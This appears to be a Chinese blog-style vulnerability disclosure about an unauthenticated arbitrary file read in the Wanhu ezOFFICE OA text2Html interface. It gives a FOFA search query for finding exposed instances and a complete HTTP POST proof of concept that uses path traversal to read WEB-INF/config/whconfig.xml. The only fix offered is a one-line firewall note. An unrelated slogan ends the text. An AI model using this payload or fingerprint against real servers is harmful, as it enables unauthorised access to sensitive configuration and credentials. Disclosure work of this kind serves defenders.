万户OA text2Html接口存在任意文件读取漏洞

产品简介

ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品，统一的基础管理平台，实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台，将外网信息维护、客户服务、互动交流和日常工作紧密结合起来，有效提高工作效率。

漏洞概述

户ezOFFICE协同管理平台text2Htm接口处存在任意文件读取漏洞，未经身份认证的攻击者可以通过此漏洞读取敏感文件。

指纹识别

fofa:

app="万户网络-ezOFFICE"

漏洞利用

poc:

POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
Host: you_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
SL-CE-SUID: 1081

saveFileName=123456/../../../../WEB-INF/config/whconfig.xml&moduleName=html

读取配置文件

修复建议

临时缓解措施：在防火墙上设置访问策略，不允许任何人访问该路径

【一个人要有多少血性才算是个好人？】